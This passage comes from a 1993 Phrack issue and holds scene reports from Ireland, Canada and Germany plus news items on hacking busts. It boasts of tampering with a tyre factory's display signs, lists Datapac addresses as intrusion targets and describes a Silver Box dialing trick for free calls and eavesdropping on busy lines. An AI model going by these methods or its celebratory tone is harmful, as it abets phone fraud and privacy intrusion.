Usenet hurts like dry ice, but restricting ftp and telnet out of the country to the privileged few, is the fatal crunch. Now, I ask you, with grief like this, is it any wonder so few Irish have made it into the Computer Underground -to those that have beaten the odds, I wish them well. OK, so what do Irish hackers like to hack? Like many hackers we just have the curiosity and desire to explore any system or network we come across -the everlasting search for that spine-tingling adrenaline rush when you've beaten the system and got somewhere where perhaps no commoner has gone before -don't ever ask us to choose between getting well drunk, having sex, or hacking --it would be a rough choice. Let me start by telling you of what I find an interesting moment in Irish hacking history. -to you it may just seem like no big deal, but we kinda like it. There is a type manufacturing company in Dublin, Ireland and they like to make tyres--in order not to ruin any reputations we won't mention any names--just another tyre company. Now this company likes nice modern systems--big colorful display panels with lots of flashing lights, to keep their managers happy and amused for hours. A happy company is lots of happy striving workers and so, a big flashy sign which displayed the number of tyres being produced, and dutifully counted upwards every time one come off the assembly line, was constructed. So they had a big sign inside the plant so the workers could see how hard they were working, and big bonuses and lots of presents were promised if they got past a certain number in a day. There was also a large juicy sign outside the plant showing this number so that the general public could be suitably impressed with the busy-bee workers and the number of tyres being produced. And all these signs and computers controlling them were connected to such mysteries as a network with a couple of black boxes which management proudly called modems -enter stage left, Irish hackers, *deep bow and evil wave* So you can imagine, one warm sunny summer's evening, when there was really nothing better to do in Dublin, strange things started to happen at the tyre factory. Yes, strange things indeed. Suddenly the workers got very lazy and started slowing down their production, becoming slower and slower and slower. The numbers stopped counting up on the glowing sign. Then the digits oddly started counting backwards. Down they went, getting faster and faster -people began to picture enraged workers destroying tyres in a crazed frenzy. Soon our sign showed that there were no tyres left and it began to dive into negative numbers of tyres. The passers-by scratched their heads in astonishment. Ah, but enough fun -this really was a very good tyre company with very hard-working workers. They deserve lots of bonuses -heck, didn't someone say this was the most productive factory in Europe? Well it was that day anyway! *evil cackle* So the signs stopped counting backwards, and suddenly began to race forwards like there was no tomorrow. The workers were scurrying back and forth at lightening speed -one hundred, two hundred..a thousand...ten thousand...what, a hundred thousand! Soon our good workers had produced more tyres in the space of 20 minutes, than visitors Disneyland had in 25 years... Ah yes, these are the things that Irish hackers like to do -we still wonder if the management gave all those good workers their bonuses?? So really, we like to investigate or hack anything that we might stumble across -anything from the local University library computer to tyre companies to networks in lands far away. One of the things we really like doing is just exploring, hopping from one network to the next, using computers in such awed places as the U.S., Canada or Mexico, this is probably because for us, even to reach such computers and networks is an achievement, that our Little Brother would deny us had he his evil ways. We think that the Internet is one of the greatest creations in a long time, and we would never want to do any malicious damage on such a free association -if only our Little Brother would let us associate freely with it, instead of making life just that little bit more difficult. We find Sprintnet and other connected goodies interesting prowling grounds, although we are the first to admit that we still have very much to learn here. To explore these systems is very interesting for us, because they are so far away and in such interesting lands that we may never see ourselves -what to you might be the old U.S., to explore the nets there gives us a sense of excitement and a variety of systems that cannot be found on such a small island as our own Ireland. And of course, there is the never-ending quest for U.S. outdials in the hope that one day we might actually reach some of the fabled U.S. h/p boards and actually meet a real Fed or two. *snicker* Turning from the strictly hacking scene for the moment there are some Irish people interested in the phones and other phun things -a while back two college guys were busted for cracking an eleven digit code on some new phone system chip or something, which had given them unlimited dialling access and other phun privileges. -then there was the magic toll free number which for a month or two gave the Irish population unlimited access to the outside world (a big thank-you goes to whoever worked that one out. *grin*) I'm told from reliable sources that we have a pretty sophisticated phone system, a matter we soon hope to be investigating, but this does not seem to have stopped phreakers from trying, and if we manage to work anything out, we'll, as our 'Telecom Eireann' so aptly put it 'Keep in touch across the world'. Sadly, we are plagued by outrageous phone charges, even for local calls and hence many Irish boards have failed to blossom -of those that do, the sysops seem to be little interested in h/p talk and I know of no dedicated h/p Irish board. There also used to be a type of Underground meeting that occurred every dark rainy Sunday afternoon, down in the Ormond, a hotel in Dublin city centre. It passed unheeded under the guise of a computer club, but the bloke who ran it was a renowned con-man, and dealer of everything and anything from car radios to Rolex watches -in any event the club must have been one of the biggest WareZ swapping centres, including all the latest videos from the U.S. which would not be released in the cinemas(movies) here until six months later. Generally people interested in the same computer type things just got together to chat and swap the latest news, disks and videos -an interesting place with interesting folks, which sadly no longer seems to happen. Perhaps someone will revive something similar in the near future. Well, I'll end the tale there for the moment. Hopefully you've gotten a little flavor of our little Underground, watched over by our Little Brother, in our little country called Ireland. I'm not sure how I ended up writing this article, but since nobody else stepped forward, I thought Ireland should at least get some kind of mention, if nothing else -so you can /dev/null any flames. Before I sign off, I'd just like to thank Phrack not only for giving me the chance to tell my tale, but for supplying us with a great publication and guide to the Underground. Finally, if you are an Irish hacker/phreaker, then get in touch now!!! -I really want to be able to say that I can count the number of Irish hackers I know on two hands, and not just one, before the end of the decade! Also, I am always interested in talking to anyone interested in the hack/phreak world so get in touch if you want to chat -just remember, we are no elite! (I don't suppose anyone out there, knows anything about the Irish phone system? *shrugs*) Ok, I can be reached at the following, for the next little while: (Yes, I do have Irish a/c's but not for thine eyes...) al575@yfn.ysu.edu hawkwind@m-net.ann-arbor.mi.us hawkwin@santafe.edu (note: no 'd' at end userid) I'm also sometimes on IRC, and may hopefully be on phantom soon. Well, as we say in Ireland, good luck and may the road rise up before you. Slan Leat, Hawkwind. ***************************************************************************** Canada All is Quiet on the Northern Front Written and compiled by Synapse Welcome to the barren wastes or rather the undeveloped wastes if you will. Welcome to Canada. A realm seldom traveled and less often explored. Canada, or .ca if you will, is virgin country in the net. There are places that have been sitting idle for years on our nets that still have default accounts in use. There is an unmeasurable amount of data out there waiting to be tapped. The possibilities in this are endless, Canada is untouched for the most part, and as developed networks go, I feel that Canada is as close to The 'Undiscovered country' as you can get. Most likely if you are reading this article you will be of a nationality other than Canadian. If so, perhaps this will be an educational experience for you. To explain our nets and our scene here in the far far north, I must first explain our nation and its greatest difficulty, it has NO identity, therefore it tends to mirror those it is enamored with. Hence our scene resembles an amalgamation of whatever seems popular in the nets at a given time. Most often it attempts somewhat miserably to emulate the scene south of our border, the great U S of A. And in short it fails miserably. This is not to say that Canada does not have a scene of its own nor is it attempting to take away from those scenes that have developed fully on their own within .ca. It is simply bringing to light a problem that plagues our scene and dilutes it for those who are serious about the computer underground, and whatever ideals it may contain. If you travel the nets in Canada you will find that dissent and "ElYtEeGoStRoKInG" are staple with both the Hacking and Warez scenes all throughout the nine provinces and 2 territories. As I am sure you know this is not a problem unique to .ca. However in a scene as minute and spread painfully thin as ours, arrogance and mis-communication can be fatal in the way of cooperation gaps. This has proved the case many times in the recent past, and I am sure it will in the near future as well. Canada seems to a have a communication barrier that separates east from west. There is simply close to no communications between the two. It is as if we are in separate hemispheres and lost to the technology of fibber optics and damned to smoke signals and drum beating. I have to wonder sometimes if both sides are so involved in their own local power struggles, that the rest of the world has melted away including their country men on either side. Alas it is time to dive into this the this of the article. To detail the complete underground in Canada would be impossible for me to do, to even give a non-biased view would be impossible. So if you feel that this is simply an overextended opinion, thank IBM for the PgDn key and spare yourself some opinionated text. The Almost LODs of .ca Just like the U.S., Canada is proliferated with umpteen amounts of upstart groups who after reading some trashy second rate book on LOD or Kevin Mitnick, have decided that they have found what it is to be elyte. Most often these will be the prominent voices on underground boards spitting flame and stroking immeasurably unhealthy egos, and boasting how proficient they are with toneloc and Killer Cracker. However as with most boasts put forth by fourteen year olds, nothing comes of it. However if you can manage passage through the quagmire of shit that serves as the .ca scene, then you will most likely encounter some of .ca's more serious minded types who while retaining talent and a penchant for learning, do not sport an ego of astronomical proportions, and wit that would bring condescension from an ant. The following is a short list of several of .ca's more prominent if not more talented groups. RaBID The Virus People If the Virus world is your environment, then most likely you have stumbled across the work of RaBID, hopefully not on the receiving end.. Rabid is based out of 416 or rather Toronto Canada, at it's prime Rabid was running a mail net that spanned Canada and were releasing enough material to employ the boys at McAfee. Things have changed. While Rabid had at one point been a productive group (if you can call a virus group productive) time seems to have worn their edge, in fact Rabid as a group have failed to release anything of value in a great long time. Perhaps this will change. If nothing else Rabid did bring a much needed ego boost to the Canadian scene, in doing so they opened the door for other such groups to be seen on the international level with out being laughed out of the nets. For this if nothing else they deserve recognition. There is a great deal more to be said about Rabid, however as I said all the information given here will be cursory, if you require an information at all in the future on Rabid or any of the groups mentioned below I will leave an e-mail address below where you can write me, I will help you if I can. FOG out of 403 Calgary, Alberta No scene is complete without talented juveniles given to temper tantrums virus spreading and general malicious behavior..Enter FOG. FOG stands for the Fist Of God, it is for the most part a group of individuals who go through unnatural amounts of effort to get under the skin of others. Yet beyond juvenile behavior that tends to underscore most endeavors they undertake. FOG does for the most part work very diligently for a united .ca scene. They have in the past run a nation wide net using encrypted mail procedures so that dialogue could be opened between the east and western scenes. This event was stopped when the Hubs house was raided by the Royal Canadian Mounted Police for suspected telco abuse, they were no charges laid however yet the organizers felt that the information passing through the net was much too valuable to be compromised by a bust. The net was killed. After the net disappeared several members of FoG began writing bbs software to be spread across the country to make networking easier or rather standardized. The bbs also includes encryption options for the mail, and will soon be HAM radio as well as cellular modem capable. This program is available to any who wish to take it, as I said earlier, just mail me. NuKE Making Art out of Arrogance NuKE hails from 516 Montreal, Canada. It as far as I can see primarily now a virus group. Producing and modifying strains, for the most part NuKE has been the most active underground .ca group that has seen movement on an international level, with this past year. It's membership has changed quite severely since I last had contact with them. Therefore I fear that to publish anything else on them would be inaccurate and therefore an injustice. However if you are interested in pursuing this topic........Mail me. As you can see these are cursory overviews of Canada's groups it is of course largely incomplete, I provided it only to serve as a guide for the feeling of Canada's groups. There are of course many worth mentioning that I failed to show, and moreover there is a great deal more to the groups that I did mention. To those who are in the above groups are unhappy with the opinion put forth please by all means FUCKOFF. I e-mailed all of you, and in your infallible wisdom you failed to reply. So suffer with it :> .ca and the law While Canada has been for the most part largely un-abused by the 'Computer Criminal'. It's laws are none the less fairly advanced. Our legislators to their credit have kept a close eye on our neighbors in the south, and have introduced laws accordingly. The following is the Canadian criminal code as pertaining to Computer Crime. 342.1 (1) Every one who, fraudulently and without color of right, (a) obtains, directly or indirectly, any computer service, (b) by means of an electro-magnetic, acoustic, mechanical or other device, intercepts or causes to be intercepted, directly or indirectly, any function of a computer system, or, (c) uses or causes to be used, directly or indirectly, a computer system with intent to commit an offense under paragraph (a) or (b) or an offense under section 430 in relation to data or a computer system is guilty of an indictable offence and liable to imprisonment for a term not exceeding ten years, or is guilty of an offence punishable on summary conviction. (2) In this section, "computer program" means data representing instructions or statements that, when executed in a computer system, causes the computer to perform a function; "computer service" includes data processing and the storage or retrieval of data; "computer system" means a device that, or a group of interconnected or related devices one or more of which, (a) contains computer programs or other data, and (b) pursuant to computer programs, (i) performs logic and control, and (ii) may perform any other function; "data" means representation of information or of concepts that are being prepared or have been prepared in a form suitable for use in a computer system; "electro-magnetic, acoustic, mechanical or other device" means any device or apparatus that is used or is capable of being used to intercept any function of a computer system, but does not include a hearing aid used to correct subnormal hearing of the user to not better than normal hearing; "function" includes logic, control, arithmetic, deletion, storage and retrieval and communication of telecommunication to, from or within a computer system; "intercept" includes listen to or record a function of a computer system, or acquire the substance, meaning or purport thereof. 430. [...] (1.1) Every one commits mischief who willfully (a) destroys or alters data; (b) renders data meaningless, useless or ineffective; (c) obstructs, interrupts or interferes with the lawful use of data; or (d) obstructs, interrupts or interferes with any person in the lawful use of data or denies access to data to any person who is entitled to access thereto. [...] (8) In this section, "data" has the same meaning as in section 342.1. As you can see our criminal code carries severe penalties for both Hacking and Virus spreading however, there is little precedent to set sentences by. While this is reassuring, there seems to be a new trends to prosecute those who are caught at computer crime. Moreover it seems to be a trend to prosecute with setting precedence in mind.. So for those of you in .ca who have busted recently I would begin to fear right about now. For the most part most computer crime in Canada that results in busts is telco related, most often the charges are federal but the sentences are light, however as I said before, this is changing. And will continue to change with each new bust , welcome to the new dawn I suppose. Datapac, Canada's first net As it stands Datapac is Canada's largest and most used network, it is old archaic and slow, yet still it is immense amounts of fun to play with. The following is a technical excerpt to help you understand the operation of Datapac and how to maneuver it. Those of you who are already familiar with the workings of this type of network will find this dry and repetitive for those of you who are not familiar it may make for some learning. After the manual entry you will find a list of interesting sites to explore with, enjoy.... Datapac 3101 "Welcome to the Dark Ages" Interface (ITI) in a Packet Assembler/Disassembler (PAD), which allows the devices to access the Network over dial-up (DDD) or Dedicated Access Lines. ITI, the end-to-end protocol for Datapac 3101, conforms to the CCITT recommendations X.3, X.28 and X.29 and supports access to the Datapac Network for asynchronous, start-stop character mode terminals. X.3 specifies the operation of the PAD. It contains the specifications for the twenty-two International parameters and their operation. X.25 specifies the command language between the terminal and the PAD. It also specifies the conditions which define the command mode and the data transfer mode. X.29 specifies the procedures to be followed by an X.25 DTE to access and modify the parameters in the PAD as well as the data transfer procedure. The Datapac 3101 service provides for terminal to Host (user's computer) and terminal to terminal communication. The Host access should conform with the X.25 protocol, using the Datapac 3000 access service, and also support the higher level protocol conventions for ITI. Host access may also be provided via the Datapac 3101 service for some applications. The Datapac 3101 service also provides block mode and tape support. INTERNATIONAL PAD PARAMETERS ---------------------------- 1) Ability to Escape from Data Transfer State* The setting of this parameter allows the user to interrupt the communication of his or her application (data transfer mode) and interact with the PAD (common mode). The character to do this is "ControlJP". To return to data transfer mode, press the carriage return or enter a blank command line. If the user wants to send a "ControlJP" to the Host, with this parameter set set to one, simply hit ControlJP twice and the second ControlJP will go to the Host and the user will remain in data transfer mode. This also applies to the user data field in the call request command line. Parameter Number: 1 Possible Values: 0 = Escape not possible. 1 = Escape is possible. *Note: Escape from Data transfer mode may also be possible using the break signal if parameter seven is set to eight. 2) Echo* This parameter indicates to the PAD whether or not the terminal input data must be echoed. This may be required if the user's terminal cannot echo back what is being entered. Parameter Number: 1 Possible Values: 0 = No echo. 1 = Echo. *Note: Echo will also be affected by the setting of Parameter 20. 3) Selection of Data Forwarding Signal This parameter indicates to the PAD the set to terminal generated characters or conditions that will cause data to be forwarded to the destination. For example, (CR) can be used as a data forwarding signal on receipt of a (CR) from the local DTE Y, the PAD will forward all characters in its buffer to the remote end, including the (CR). If P13 is set to 6.7, 22 or 23, a (LF) will be included in the packet and will delimit it. Data is also forwarded when the buffer is full whether or not a forwarding character is received. Parameter Number: 3 Possible Values: 0 = No data forwarding signal. 2 = Forward on carriage return. 2 = Carriage return. 126 = All characters in columns 0 and 1 of ASCII table and the character del of International alphabet #5. 4) Selection of Idle Timer Delay This parameter is used to determine the idle timer limit value when data forwarding is based on timeouts. To optimize packetizing of data, no data forwarding signal need be specified. The PAD will then packetize data based on packet size specified (256 or 128 characters). The idle timer is used to send any packets that are not fully filled. If idle timer is activated and the Host requires the (CR) to input data, it still must be provided before the data send is accepted by the Host. The idle timer does not send any empty packets. Parameter Number: 4 Possible Values: 0 = No data forwarding on timeout is required. 1-255 = Indicates value of the delay in twenties of a second. (i.e., a value of 250 makes the time wait 10 seconds) *Note: When editing is on (P15:1), the idle timer is inactive. If this is the only data forwarding condition, turning the editing function on could cause a user terminal to hand or data not to be forwarded. 5) Auxiliary Device Control* This is used for flow control of data coming from either a PC or auxiliary device, e.g.: a paper tape machine. When set to 1 it indicates to the PAD that the data is to be read an auxiliary I/O device connected to the terminal. This parameter set to 2 indicates that the data is coming from an intelligent device, i.e., a PC, and that the PAD must exert flow control differently. Parameter Number: 5 Possible Values: 0 = No use of X-on/X-off. 1 = Use of X-on/X-off for auxiliary devices. 2 = Use of X-on/X-off for intelligent terminals. *Note: A value of 2 is recommended for PC's. 6) Suppress Network Messages This parameter indicates to the PAD whether or not Network generated messages are to be transmitted to the terminal. Parameter Number: 6 Possible Values: 0 = Suppress message. 1 = Transmit message. 5 = PAD prompt (*) follows Datapac service signals. 7) Procedure on Break This parameter is used to indicate how the PAD should process a break signal that is received from the terminal while the terminal is in data transfer state. Parameter Number: 7 Possible Values: 0 = Nothing. (remain in data transfer mode) 1 = Interrupt. (remain in data transfer mode) 2 = Reset. (remain in data transfer mode) 4 = Send an "indication of break" message to the packet mode DTE. (remain in data transfer mode) 8 = Escape from data transfer mode (i.e., enter command mode) 16 = Discard output to terminal activate Parameter 8 (P8:1) (remain in data transfer mode) 21 = A combination of 1, 4 and 16. *Note: The break signal is ignored if the virtual circuit is not established while in command state. The break signal will delete the current line. The valid values for P7 are 0, 1, 2, 8 and 21. 8) Discard Output This parameter is used in conjunction with Parameter 7. Depending upon the break procedure selected, this parameter may be set by the PAD when the terminal user requests that terminal data be discarded. This parameter must then be reset by the destination computer to allow normal delivery. The PAD will discard all packets destined for the terminal from the time the PAD sets this parameter (i.e., it receives a break signal when Parameter 7 is set to 21) to the time the parameter is reset by the destination. It can only be reset by the destination. Parameter Number: 8 Possible Values: 0 = Normal delivery of output to terminal. 1 = Discard output to terminal. 9) Padding after Carriage Return This parameter is used to specify the number of padding characters to be inserted by the PAD following a CR transmitted to the terminal. Padding allows time for the carriage to return on mechanical printing devices. Parameter Number: 9 Possible Values: 0 = 2 padding characters will be inserted at 110 bps and 4 padding characters will be inserted at higher speeds, in command mode only. (no padding is done in data transfer mode) 1-255 = The number of padding characters to be inserted in both data transfer and command mode. 10) Line Folding This parameter indicates the maximum number of printable characters that can be displayed on the terminal before the PAD must send a format effector (i.e.., ). This permits more data to be transmitted in one packet while still letting the user print out more than one line, i.e., printing out forms. 11) Transmission Speed (Read only) This parameter is set by the PAD as a result of transmission speed detection if the terminal accesses an autobaud port. When a private port with fixed speed is used, this parameter is set based on the pre-stored information selected at subscription time. Parameter Number: 11 Possible Values: 0 = 110 bps 2 = 300 bps 3 = 1200 bps 4 = 2400 bps This is all very dry stuff (what buffer isn't?) however if you need more info on it simply mail me. NUA list 20500011 Bell Northern Research 39400100 Envoy (English/Francais) 30400101 Envoy (Anglais/French) 39500032 Globe and Mail 41100015,I Infoglobe 59600072 University of Athabasca 60100010 Universtiy of Alberta 67100752 ? 67100673 ? 20400177 QL 29400138 Tymnet CIS02 7770,101 'free demo' 20401338 Tymnet 41100043 CSG Infoglobe 73500023 KN Computer MCT 59100092 Keyano College (Alberta) 72400014 System Max-Daisey (VAX/VMS) 69100018 Cybershare 55500010 ? 29400263 ? 29400263 ? 67100086 Sears 67100132 Primenet 67100489 Terminal ID=VAX 67100629 (VAX/VMS) 67100632 McKim Advertising (Vancouver) 93200233 University of Manitoba 79400100 Envoy Info/Mailbox 92100086 Datapac General Info 20500011 Canole II I have kept a number of sites I have, off this list simply to ensure I keep them, however there are thousands of Virgin sites available off of Dpac. Something to keep your eyes open for are Canadian government machines which are fairly abundant on the Dpac. Beyond Dpac, there are some actual BBS's worth calling, most however would rather not have there numbers published in Phrack. None the less here are some stable, and relatively active BBS's: The Underground Subway 606-590-1147 Gridpoint 403-283-5519 The G-spot (Rabid HQ) 416-256-9017 Front 242 (VX)(Rabid) 416-790-6632 I am sorry for what this article did not cover, in the umpteen or so pages I have punched up, I still have covered not even a tenth of what I would like to cover. For those who wish a reliable UG bbs for list .ca or more info on the Dpac or wish to elicit any other response to this article please e-mail me at besaville@sait.ab.ca ********************************************************************* The German Scene (by SevenUp) ---------------- CCC --- Talking about the German Hacker Scene, the Chaos Computer Club (CCC) comes to most people's mind. They are most famous for their 'NASA-Hack' and their publications like Hackerbibel and Datenschleuder, a monthly magazine talking about 'softer' stuff than 2600, such as MUD's, the Internet and BBS'es. They organize the annual Chaos Communication Congress, held annually from December, 27th till 29th in Hamburg. Usually around 1000 people show up there, discussing many different topics, such as Phreaking, Internet, Women and Computer, Cellular Phones, Phone Cards and others. Many well-known people, like Pengo and Professor Brunnstein the meeting. There are usually also shows of Horror Movies (but no porns like at HohoCon), but it's not a real 'party' like SummerCon or the upcoming Hacktic Party. Another annually meeting from CCC members and many other hackers is at the huge computer fare 'CeBit' in Hannover in March. The Get Together is at the Telekom booth on Tuesday at 4pm. Usually Telekom (the German phone company) representatives are very kind, give away phone cards (value: $4), but usually don't have any interesting new informations. There haven't been any hacks affiliated with the CCC for the last couple of years. The CCC tries to get away from their former criminal image, talking mostly about risks of computers in society, and producing lots of press releases. The KGB Hack ------------ Most of you might know "The Cuckoo's Egg" by Cliff Stoll. His exciting novel talks about German Hackers hacking for the KGB. These guys were using the German x.25 network Datex-P to get to a US University, and from there to several hosts on the Arpa/Milnet (Internet). They were using mostly basic knowledge to get into several UNIX and VMS Systems, reading personal Mail and looking for documents the 'Russians' might have been interested in. It all ends up with the suicide (murder?) of Karl Koch, one of the hackers. Although these hackers weren't CCC members, there is a pretty good book from the CCC about it, containing more facts than Cliff's book: "Hacker fuer Moskau", published by Wunderlich. This is probably the best known German hack of all times. Networks -------- I. x.25 The German x.25 System is called 'Datex-P' and has the DNIC (2624). Dialups are in almost every area code, or can be reached locally from everywhere. There are also Tymnet and Sprintnet Dialups available in the major cities, with some limitations though. Tymnet won't connect you to dpac (Datapac Canada). Sprintnet has just a true dialup in Frankfurt, the other dialups are handled by their partner Info AG, which allow calling most RNUAs, but most Sprintnet NUIs won't work. There is a 'Subnet' in the Datex-P Network, the so called 'WiN' (which means scientific network). Almost all universities have connections to the WiN, which means they pay a flat rate each month, which allows them to make as many calls and transfer as much data to other WiN hosts, as they like. Usually x.25 rates are charged by the volume of packages/data. You can identify WiN addresses easily, because they start with (0262)45050... There are many gateways from WiN to Internet, and also a few from Internet to WiN. WiN NUAs can be reached without problem from any x.25 network in the world, like Sprintnet or Tymnet; though most WiN PADs will refuse to connect to non-WiN NUAs. There are also a couple of German systems, international hackers used to like. The most-famous is probably Lutzifer in Hamburg, Germany. It can still be reached from x.25 Networks like Sprintnet or Tymnet. Around two years ago, British, American and other hackers used to trade all kinds of codez on "Lutz". But now, Pat Sisson ("frenchkiss") from Sprintnet Security and Dale Drew ("Bartman") from Tymnet Security, try to track down everyone abusing their NUIs or PADs. Before Lutzifer went up 2.5 years ago, tchh and Altos Munich were most attractive. They were running the same simple Korn-Chat on an Altos. There are still a couple of other x.25 Systems, which attract hackers from all over the world, like qsd, Pegasus (in France and Switzerland) and Secret Tectonics / sectec, a rather new semi-private Board in Germany with x.25 and Direct Phone Dialups, uucp/Internet Mail, File and Message Bases and all Phrack Issues as well. II. Internet But now, most hackers quit the x.25 scene and tried to get onto Internet. Unlike the fast Internet connections in the USA between .edu sites, German Internet connections are mostly routed through slow (9.6kbps or 64k) x.25 Links. This is mostly the fault of the German phone company 'Telekom'. They have a monopoly on phone lines in Germany and charge 2-10 times higher fees than American phone co's. Even local calls are US$1.50/hour. There aren't many German Internet Sites that attract foreign hackers, compared to US Sites that German Hackers are interested in. There are almost no public Internet BBSes with free access in Germany. Also, German Universities have often a pretty tight security and get mad easily. III. Amiga Kiddos BBS'es are still the major hang-out besides IRC. The Amiga Scene with its K-rad Kiddos (most of them under 18 years) used to be dominant a couple of years ago, trading Calling Cards and new Blue Box frequencies to call the best boards in the US to leech the latest games. But recently, the IBM scene caught up and many guys switched from Amiga to IBM; so over 50% of pirate boards are IBM boards now. But recently, BBS sysops have to face hard times. A couple of months ago, lots of BBS'es in Berlin, but also in Bavaria and North Germany got 'busted' - raided by the police because of their illegal warez. (see my article in Phrack 42 about it) The man behind these actions is the lawyer 'Guenther Freiherr von Gravenreuth', who works for Acti- vision, the SPA and BSA. He is tracking down kids with piracy as recklessly as BBS Sysops, who sell subscriptions for a 'Disabled Upload/Download Ratio' for around $100 a month. There have been a couple of these trials lately, without much notice by the press. Mr Gravenreuth is also responsible for many people's fear to put up a new BBS - especially in Bavaria where he lives. Also, calling the favorite Board in the US is getting harder and harder, as covered in the next Chapter. IV. The Phone System Blueboxing used to be the favorite sport of many German traders for the last couple of years. But some phreakers wanted to make more money, selling the Bluebox Story to Magazines like Capital or Spiegel, or to TV Shows. Even AT&T and the German Telecom, who seemed to be blind about this phreaking, couldn't avoid facing the truth now - they had to do something, not only to recover from the huge losses, but also to save their reputation. There are a lot of rumors and text files about the actions these phone companies took; most of them are fakes by 'eleet' people, who don't want the 'lamers' to keep the trunks and the eleet boards busy. But some actions seem to be certified; e. g. Telekom bought some intelligent filter boxes from British Telecom. These boxes should detect any C5 tones (especially 2600 Hz), being sent by phreakers; and log the number of the phreaker, if possible. If possible, because the Telekom doesn't have ANI in most cases. Until recently, all phone lines used to be analog, pulse dialing lines with huge relay switches. Then the Telekom started switching to 'modern' digitally switched lines, which allow Touch-Tone-Dialing, and also a few other nice features, which I want to cover now. One of these nice features 'died' just about 3 weeks ago, because someone informed the new magazine 'Focus'. The trick was very simple. All you need was a digital line which allowed you to dial touch tone, and a 'Silver Box' - a device, that allows you to dial the digits 0...9, #, * and also A, B, C and D - many modems have this capability too. All you had to do was to dial 'B' + 'xxx' + 'yyyy', where 'B' is the Silver Tone B, 'xxx' is an internal Telekom code, and 'yyyy' are the last four digits of a phone number. The internal codes 'xxx' usually look like 010, 223, 011, and so on - they switch you to an exchange, mostly in your own area code, but often in a different one! Notice that exchange number and internal code are different. When you are connected to a certain exchange, dialing the four 'yyyy' digits connects you to a certain phone number in that exchange. This enables you to make free calls - also to different area codes, but you have to try around to find which code matches with which exchange. But that's not all; now the fun just begins! Imagine the number you dial is busy... you won't hear a busy signal then, you would just be connected into the call! You could listen to the conversation of two parties! Imagine how much fun this could be... and imagine someone would be listening to your private conversations! When Telekom read the article, most area codes lost this capability; but there are still some reported to work. Blueboxing is getting harder and harder, MCI and AT&T keep on changing their 'Break' frequencies more rapidly (though they still use in-band CCITT C5 signalling); so more and more people offer Calling Card subscriptions, and even more traders, who refuse paying Telekom's high fees, buy them. They are offered mostly by Americans, Belgium people and Germans, for about $100 a month. Also, I haven't heard of any case where a German got busted for abusing AT&T's Calling Cards; probably because Telekom can't really trace phones lines, either technically nor legally (they may not just 'tap' phone lines because of people's privacy). Also, German Toll Free Numbers (they start with 0130) are getting more and more. I would take a guess and say they grow 20%-80% a year. There isn't any official directory nor a directory assistance for these numbers, and many companies want these numbers to remain 'unknown' to the evil hackers, since Telekom is asking high fees for them. So many Germans compile and scan these numbers; there is also a semi-public list on them by SLINK - available on many BBS'es and on local German Newsgroups. This list also contains numbers of business companies like Microsoft, Hewlett Packard or Dell in Austin (hi erik :) ), so it is quite useful for 'normal people' too. There have also been reported the first PBX-like Systems in Germany; this is quite a sensation, because German Telekom laws don't allow PBX'es, or even the linking of two phone lines (like 3-way calling). So in fact, these Systems weren't real PBX'es, but Merial Mail VMB Systems with the Outdial feature. PaRtY 0n! --------- There are a couple of interesting get-togethers and parties. I mentioned the annual Chaos Communication Congress after Christmas; the CCC also has weekly meetings on Tuesday. There are the annual CeBIT hacker parties, on the Tuesday at CeBIT in March. After the CeBIT meeting and weekly, there are get-togethers at the 'Bo22', a cafe in Hannover. These meetings have tradition since the KGB Hacks of Pengo and 'Hagbard Celine' Karl Koch, as I mentioned above. You will still find friends of them there, if you drop by on a Tuesday. Since a couple of months and with Emmanuel Goldstein's great support, we are having 2600 meetings in Munich, Germany too! These are the first 2600 meetings outside of the US; the first meeting was quite successful with over 30 people, and the next one in July will be successful too, hopefully. Some international visitors from the US are expected, too. These meetings are held at around 6pm in front of Burger King at Central Station, Munich. I also like to thank Munich's Number One Hit Radio Station 89 HIT FM at this point, for letting us into the air for 3 minutes, talking about the 2600 meeting and a bit about 'hacking'. There are also semi-annual IRC parties in Germany, but they are 'just' parties with usually 100-150 people. Hacking and phreaking isn't a topic there; probably less than 10% of them know what H/P means. ==Phrack Magazine== Volume Four, Issue Forty-Three, File 27 of 27 PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN PWN PWN PWN Phrack World News PWN PWN PWN PWN Compiled by Datastream Cowboy PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN New Yorker Admits Cracking July 3, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~ (From AP Newswire Sources) Twenty-one-year-old Mark Abene of New York, known as "Phiber Optik" in the underground computing community, has pleaded guilty to charges he participated in a group that broke into computers used by phone companies and credit reporting services. The Reuter News Service says Abene was the last of the five young men indicted in the huge 1991 computer break-in scheme to admit committing the crimes. The group called itself "MOD," an acronym used for "Masters of Disaster" and "Masters of Deception." Abene pleaded guilty to one count of conspiracy and one count of unlawful access to computers. He faces a possible maximum prison term of 10 years and fine of $500,000. ----------------------------------------------------------------------------- China Executes Computer Intruder April 26, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (From AP Newswire Sources) A man accused of invading a computer and embezzling some $192,000 has been executed in China. Shi Biao, an accountant at the Agricultural Bank of China's Jilin branch, was accused of forging deposit slips from Aug. 1 to Nov. 18, 1991. The crime was the first case of bank embezzlement via computer in China. Authorities became aware of the plot when Shi and his alleged accomplice, Yu Lixin, tried to wire part of the money to Shenzhen in southern China. ----------------------------------------------------------------------------- Teen Takes the A Train --- Literally May 13, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (From AP Newswire sources) A 16 year old 10th grader successfully conveyed passengers on a NYC 10 car subway train for 2.5 hours until he went around a curve too quickly and could not reset the emergency brakes. Keron Thomas dressed as a NY subway train engineer impersonated Regoberto Sabio, a REAL subway motorman, while he was on vacation and even obtained Sabio's "pass number". Thomas was a Subway enthusiast who hung around train stations and areas where subway motormen and other subway workers hang out. A NYC subway spokesman was quoted as saying "Buffs like to watch...pretty soon they figure out how" [to run the train]. "This guy really knew what he was doing". Thomas was charged with criminal trespassing, criminal impersonation, and reckless endangerment. ----------------------------------------------------------------------------- Banks React To Scheme That Used Phony ATM May 13, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (From AP Newswire Sources) At least three people are believed to be involved in an ATM scam that is thought to have netted roughly $ 60,000. The fraud was perpetrated by obtaining a real ATM machine (theorized to have been stolen from a warehouse) and placing it in a Connecticut shopping mall. When people attempted to use the machine, they received a message that the machine wasn't working correctly and gave back the card. Little did they know that their bank account number and PIN code was recorded. The fake machine was in place for about 2 weeks. It was removed and the thieves began making withdrawals. The Secret Service thinks the scammers recorded anywhere from 2000 to 3000 account numbers/pin codes 